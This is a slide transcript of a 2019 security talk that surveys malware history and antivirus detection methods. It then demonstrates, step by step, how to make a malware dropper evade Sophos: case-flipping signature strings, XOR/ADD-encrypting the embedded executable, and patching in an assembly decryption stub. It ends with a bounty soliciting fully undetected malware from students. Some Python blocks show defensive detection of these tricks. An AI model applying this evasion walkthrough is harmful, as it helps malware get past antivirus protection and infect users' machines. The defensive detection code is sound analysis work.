AntiVirus HAX! - slide transcript (bluekaizen.org), presented by Ehab Hussein

Posted on 08-May-2019

http://www.synapse-labs.com info@synapse-labs.com

AntiVirus HAX!
Presented by Ehab Hussein

Synapse Malware research team:
Sofiane Talmat (Algeria)
Ehab Hussein (Egypt)
Saad Talaat (Egypt)
Amr Thabet (Egypt)

Synapse Intro

History

AV Detection Techniques

Bypassing Sophos :) Demo

Student Bounty Challenge $$$


Solution

Development

Security

Services

Corporate Services

Trainings


Viruses don't harm, ignorance does!

« The evolution of malware within the last ten years is described by the evolution of the people who develop it » (Eugene Kaspersky)

– 1948 – 1966 (First theoretical approach)

John von Neumann « Theory of self-reproducing automata »

– 1971 (First Worm) Robert (Bob) H. Thomas (BBN Technologies)

"I'm the creeper, catch me if you can!"
Machine: PDP-10
System: TENEX
Transport: ARPANET, the world's first operational packet switching network and the core of the set of networks that came to compose the global Internet. Funded by DARPA.

WORM


TROJAN HORSE


– 1974/1975 (First Trojan Virus)

John Walker « ANIMAL » UNIVAC 1108


– 1982/1982 (First microcomputer Virus)

Rich Skrenta « Elk Cloner »

Apple II Boot Sector


BOOT SECTOR


– 1986 (First IBM-PC Virus) Basit & Amjad Farooq Alvi

« Brain Boot Sector » « Pakistan Flu » « Lahore »

– 1986 (First File Infector Virus)

Ralf Burger « Virdem model ».com

VirDem Ver.: 1.06 (Generation #) aktive. Copyright by R.Burger 1986,1987 Phone.: D - 05932/5451
This is a demoprogram for computerviruses. Please put in a number now. If you're right, you'll be able to continue. The number is between 0 and x

COM INFECTION


1987 (Destructive Viruses) Vienna / Lehigh / Yale / Stoned / Ping Pong

Cascade (self-encrypting file virus)
IBM Antivirus

1987 Jerusalem

« Infecting .EXE » / Interrupt / Friday 13th

Aliases and variants: 1808 (EXE), 1813 (COM), ArabStar, BlackBox, BlackWindow, Friday13th, HebrewUniversity, Israeli, PLO, Russian

EXE Infection


1988 (First Internet Worm) Robert Tappan Morris

« The Morris worm »: buffer overflow, 6000 infections

BUFFER OVERFLOW


1988 (First Multipartite Virus) Ghostball

EXE / COM / Boot Sector

Multipartite virus

A multipartite virus is a computer virus that infects and spreads in multiple ways. The term was coined to describe the first viruses that included DOS executable files and PC BIOS boot sector virus code, where both parts are viral themselves. For a complete cleanup, all parts of the virus must be removed.

1988 (First Polymorphic Virus) Mark Washburn & Ralf Burger

« the Chameleon family » « Vienna and Cascade »

1260

Polymorphism


1995 (First Macro Virus) « Concept »

Sub MAIN
REM That's enough to prove my point
End Sub

Macro Virus

A macro is a language built into a software application such as a word processor. Some applications (notably, but not exclusively, the parts of Microsoft Office) allow macro programs to be embedded in documents, so that the programs may be run automatically when the document is opened.

1998 Chen Ing Hau, CIH v1

« Chernobyl / Spacefiller »

Overwriting critical information on infected system drives and, more importantly, in some cases corrupting the system BIOS.

1999 (Year of the worms)

Jan 20: Happy99 worm (emails) (Spanska)

March 26: Melissa worm (Microsoft Word / Outlook)

June 06: ExploreZip worm (Microsoft Office documents)

December 30: Kak worm (JavaScript worm / Outlook Express bug)

2000 (The most damaging worm ever) « ILOVEYOU worm (VBS/Loveletter) »

VBScript


2000 (The year of exploits)

May: Sadmind worm (Sun Solaris / Microsoft IIS)

July: Code Red worm (Microsoft IIS indexing)

September: Nimda worm (Windows / Code Red / Sadmind)

October: Klez worm (MS IE / MS Outlook / Outlook Express)

2002 (Metamorphic Virus) Mental Driller

« Win32/Simile » (Etap / MetaPHOR), 90% metamorphic, May 14 / system locale

METAMORPHIC VIRUS

Metamorphic code is code that can reprogram itself. Often, it does this by translating its own code into a temporary representation, editing the temporary representation of itself, and then writing itself back to normal code again. This procedure is done with the virus itself, and thus the metamorphic engine itself also undergoes changes. This is used by some viruses when they are about to infect new files, and the result is that the "children" will never look like their "parents".

2002/2003 (Rise of the RAT & Trojans)

A RAT, or remote access trojan (sometimes remote administration tool), is a program that listens for and accepts connections from a remote third party and carries out the commands that third party gives it.

Beast (Delphi)
Optix Pro
Graybird
ProRat

2004 (First Webworm) « Santy »

- Target: phpBB forums
- 40 000 sites infected

2006 (First ever Mac OS X virus) « OSX/Leap-A or OSX/Oompa-A »

LAN worm
Bonjour protocol (iChat buddy list)

2007 « ZEUS » (drive-by downloads / phishing)

June 2009: 74,000 FTP

3.6 million infections in the USA

28 Oct. 2009: 1.5 million phishing messages on Facebook

14/15 Nov. 2009: 9 million infected emails (Verizon Wireless)

Credit cards of 15 banks compromised

1 Oct. 2010: FBI / $70 million and 90 arrests

May 2011: source code release

2007 (bounty: $250,000) « Conficker »

NetBIOS exploit, MS08-067

BOTNET

Cyber Weapons!

2010: STUXNET, destructive (targets industrial systems)

2011: Duqu, non-destructive (targets industrial systems to gather information that could be useful in attacking)

AntiViruses


Possibly the first publicly documented removal of a computer virus in the wild was performed by Bernd Fix in 1987. Enough said...

Detections


Signature Based Detection


Behaviour Based Detection


Normalization


What about rootkits?

Signature-Based
File Integrity Monitoring (ex: Tripwire)
Hooking Detection
Network-Based Detection
Heuristics-Based Detection
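Signature-based detection, and why the normalization step listed above matters, as an added example in Python (not code from the deck or from Synapse): a scanner that matches a string signature byte for byte, beside one that case-folds the data and also widens the pattern to UTF-16LE before matching. The sample bytes and the marker offsets are constructed for the example; the demo later in this deck defeats a case-sensitive string signature by flipping the case of a few letters, which is exactly the gap the normalized scanner closes. The (offset, length) entry format mirrors the signature list shown in the demo.

```python
# Constructed sample image (hypothetical bytes, not from the deck's binary):
# the "turko" marker in plain ASCII, with flipped case, and as UTF-16LE.
SAMPLE = (
    b"\x00" * 16
    + b"turko"                      # plain ASCII at offset 16
    + b"\x00" * 11
    + b"TuRkO"                      # case-flipped copy at offset 32
    + b"\x00" * 11
    + "turko".encode("utf-16-le")   # UTF-16LE copy at offset 48
    + b"\x00" * 6
)
SIGNATURE = b"turko"


def scan_naive(data, sig):
    """Exact byte match: offsets at which sig occurs verbatim."""
    hits, pos = [], data.find(sig)
    while pos != -1:
        hits.append(pos)
        pos = data.find(sig, pos + 1)
    return hits


def scan_normalized(data, sig):
    """Match after normalization: ASCII case is folded (bytes.lower touches
    only A-Z, so NUL bytes and binary data are left alone) and the signature
    is also widened to UTF-16LE so one ASCII pattern covers both encodings.
    Returns sorted (offset, encoding) tuples."""
    folded, sig_l = data.lower(), sig.lower()
    wide = b"".join(bytes([c, 0]) for c in sig_l)
    hits = [(p, "ascii") for p in scan_naive(folded, sig_l)]
    hits += [(p, "utf-16le") for p in scan_naive(folded, wide)]
    return sorted(hits)


def verify_fixed_offsets(data, sig, entries, normalize=False):
    """Check a deck-style signature list of (offset, length) pairs; True where
    the bytes at that offset still equal the signature. Without normalization
    a single flipped letter breaks the match."""
    out = []
    for offset, length in entries:
        chunk = data[offset:offset + length]
        out.append((chunk.lower() if normalize else chunk) == sig[:length])
    return out
```

Case folding is the cheapest normalization and it is also the one most worth pairing with a second signal, since a signature that survives case changes is still a fixed string; the same scanner works unchanged on the UTF-16LE copy because the fold leaves the interleaved NUL bytes alone.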


Let's bypass that AV #Demo

1- Locate the signature:

In our case we have:

A- the signature "turko", found at the following (offset, length) pairs:
0x00003F87 0x00000005
0x00004343 0x00000005
0x000044EF 0x00000005
0x0002E754 0x00000005
0x0002E76C 0x00000005
0x0002E78F 0x00000005

B- the start of the MZ file to be dropped: the MZ signature starts at 37D64 (MZP).

Before the MZP there is another signature in Unicode, starting at 37D1A; it starts with the Unicode string DENAME.

2- Patching the signature:

A- the signature "turko": all we can do is change some characters to capital letters (playing with case) for all the patterns found.

B- we need to encrypt the signature starting from 37D1A (43F11A in the debugger).

In Hex Workshop we load the exe and go to address 37D1A (43F11A in the debugger).

We select from there till the end of the file (approx. 0xBC6E bytes).

We go to Tools/Operations and apply some encryption, for example:

Add 20
Xor 27

Now back in the debugger, we load the exe and go to the DATA section at address 43F11A:

We select the following part:

0043F11A 44 00 45 00 4E 00 45 00 D.E.N.E.
0043F122 4D 00 45 00 06 00 44 00 M.E..D.
0043F12A 56 00 43 00 4C 00 41 00 V.C.L.A.
0043F132 4C 00 03 00 45 00 44 00 L..E.D.
0043F13A 54 00 0B 00 50 00 41 00 T..P.A.
0043F142 43 00 4B 00 41 00 47 00 C.K.A.G.
0043F14A 45 00 49 00 4E 00 46 00 E.I.N.F.
0043F152 4F 00 07 00 52 00 4F 00 O..R.O.
0043F15A 4F 00 54 00 4B 00 49 00 O.T.K.I.
0043F162 54 00 4D 5A 50 T.MZP

We put a memory breakpoint on access on it.

We run the exe; the breakpoint is hit at the following instruction:

7C9350C0 0FB706 MOVZX EAX,WORD PTR DS:[ESI]

We can see it is in NTDLL.DLL. We look at the stack and search for the return address into our binary, so we can locate the original call address. We find the following on the stack:

0012FF00 |00403EC9 É>@. RETURN to unpacked.00403EC9 from <JMP.&KERNEL32.FindResourceA>
0012FF04 |00400000 ..@. ASCII "MZP"
0012FF08 |00403F68 h?@. ASCII "EDT"
0012FF0C |0000000A ....
0012FF10 |0012FF3C <ÿ. Pointer to next SEH record

We go to address 00403EC9 and find the following instructions:

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA
00403EC9 |. 8BF0 MOV ESI,EAX
00403ECB |. 85F6 TEST ESI,ESI
00403ECD |. 74 6B JE SHORT unpacked.00403F3A

We take the instruction that comes before the return address:

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA

and save both that address and the instruction.

Next we go to the end of the exe, say address 004307A2, and write our decryption routine:

004307A2 > 60 PUSHAD
004307A3 . 9C PUSHFD
004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A
004307A9 . B9 E6BC0000 MOV ECX,0BCE6
004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; |
004307B0 . 80F3 27 XOR BL,27 ; |
004307B3 . 80EB 20 SUB BL,20 ; |
004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; |
004307B8 . 47 INC EDI ; |
004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE ; |
004307BB . 9D POPFD ; |
004307BC . 61 POPAD ; |

Now we change the instruction:

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA (CALL 00403778)

to the following:

00403EC4 . E9 D9C80200 JMP Copy_of_.004307A2 ; (JMP 004307A2)

so that execution jumps to our decryption routine.

Then we add the overwritten call and a jump back after our decryption routine, as follows:

004307A2 > 60 PUSHAD
004307A3 . 9C PUSHFD
004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A
004307A9 . B9 E6BC0000 MOV ECX,0BCE6
004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; |
004307B0 . 80F3 27 XOR BL,27 ; |
004307B3 . 80EB 20 SUB BL,20 ; |
004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; |
004307B8 . 47 INC EDI ; |
004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE ; |
004307BB . 9D POPFD ; |
004307BC . 61 POPAD ; |
004307BD . E8 B62FFDFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA
004307C2 .^E9 0237FDFF JMP Copy_of_.00403EC9

The last step is to mark the memory at 0043F11A as writable so the routine can decrypt the data in place; this can be done with PE Explorer, for example.
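The same steps seen from the analysis side, as an added example in Python that is not part of the deck: a section-table audit that flags the writable resource section the last step produces (and any section that is both writable and executable), and a known-plaintext search that recovers the Add/Xor key pair from an encoded resource and decodes the embedded MZ image. The minimal PE, its section layout and the inner image are constructed fixtures for the example; the Add 0x20 / Xor 0x27 values come from the demo, and the section flag constants and the 0x4E offset of the DOS stub text are standard PE layout.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER, 40 bytes
DOS_STUB_TEXT = b"This program cannot be run in DOS mode"


def encode(data, add_key, xor_key):
    """The demo's Hex Workshop transform: each byte b -> (b + add_key) ^ xor_key."""
    return bytes(((b + add_key) & 0xFF) ^ xor_key for b in data)


def decode(data, add_key, xor_key):
    """The inverse, which is what the in-binary stub does: (b ^ xor_key) - add_key."""
    return bytes(((b ^ xor_key) - add_key) & 0xFF for b in data)


def build_pe(sections):
    """Constructed minimal PE32 image (DOS header, PE signature, COFF header, zeroed
    optional header, section table, raw data). Parser fixture, not a loadable program."""
    opt_size = 224
    hdr_size = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    table, body, raw_ptr = b"", b"", hdr_size
    for name, chars, data in sections:
        table += struct.pack(SECTION_FMT, name, len(data), 0x1000 + raw_ptr,
                             len(data), raw_ptr, 0, 0, 0, 0, chars)
        body += data
        raw_ptr += len(data)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + body


def parse_sections(pe):
    """Return [{'name', 'raw': (file offset, size), 'chars'}] from the section table."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    base = e_lfanew + 24 + opt_size
    out = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_FMT, pe, base + 40 * i)
        out.append({"name": f[0].rstrip(b"\0").decode("ascii"),
                    "raw": (f[4], f[3]), "chars": f[9]})
    return out


def audit_sections(pe):
    """Flag W+X sections, and a writable resource section: the demo's last step
    makes the resource it decrypts in place writable, which linkers never do."""
    findings = []
    for s in parse_sections(pe):
        c = s["chars"]
        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s["name"], "W+X"))
        if s["name"] == ".rsrc" and c & IMAGE_SCN_MEM_WRITE:
            findings.append((s["name"], "writable-resource"))
    return findings


def find_encoded_plaintext(data, known=DOS_STUB_TEXT):
    """Known-plaintext search over the add/xor key family. For each offset and xor
    key the add key is forced by the first byte, then the rest is verified, so the
    cost is 256 * len(data) rather than 65536 * len(data). Single-byte XOR (add 0)
    and single-byte ADD (xor 0) are special cases. (add+0x80, xor^0x80) is always an
    equivalent key, so both forms of the identity key are skipped and the outer
    file's own plain DOS stub is not reported. Returns (offset, add, xor) or None."""
    n = len(known)
    for i in range(len(data) - n + 1):
        for x in range(256):
            a = ((data[i] ^ x) - known[0]) & 0xFF
            if (a, x) in ((0, 0), (0x80, 0x80)):
                continue
            if all((((data[i + j] ^ x) - a) & 0xFF) == known[j] for j in range(1, n)):
                return i, a, x
    return None


def recover_hidden_pe(pe):
    """Decode the embedded image, or None. The DOS stub text sits at offset 0x4E
    of a normal MZ header, so the image is assumed to start 0x4E bytes earlier."""
    hit = find_encoded_plaintext(pe)
    if hit is None:
        return None
    offset, a, x = hit
    decoded = decode(pe[offset - 0x4E:], a, x)
    return decoded if decoded[:2] == b"MZ" else None


# Constructed sample: an inner "MZP" image, encoded as in the demo and placed in
# a resource section that has been made writable.
INNER_PE = b"MZP" + bytes(0x4B) + DOS_STUB_TEXT + b"\r\n$" + bytes(64)
SAMPLE_PE = build_pe([
    (b".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, b"\x90" * 128),
    (b".rsrc", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE,
     bytes(16) + encode(INNER_PE, 0x20, 0x27)),
])
```

Entropy checks do not help against this encoding: a byte-wise substitution only permutes the byte histogram, so the encoded resource has exactly the entropy of the plain one, which is why the search keys on known plaintext instead. The stub's XOR BL,27 followed by SUB BL,20 is the decode() order above, the reverse of the Add-then-Xor applied in the hex editor; the search returns the lowest xor key of the equivalent pair, so (0x20, 0x27) is reported rather than (0xA0, 0xA7).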


Bounty challenge
$50 discount on any Synapse course & recognition on the Synapse Labs Facebook page

To the student who sends us fully undetected malware using the same technique as our demo

Thank you
Facebook.com/Synapse.Labs

Twitter: @Synapse_Labs

My Twitter: @__Obzy__
My Facebook: www.facebook.com/Obzysynapse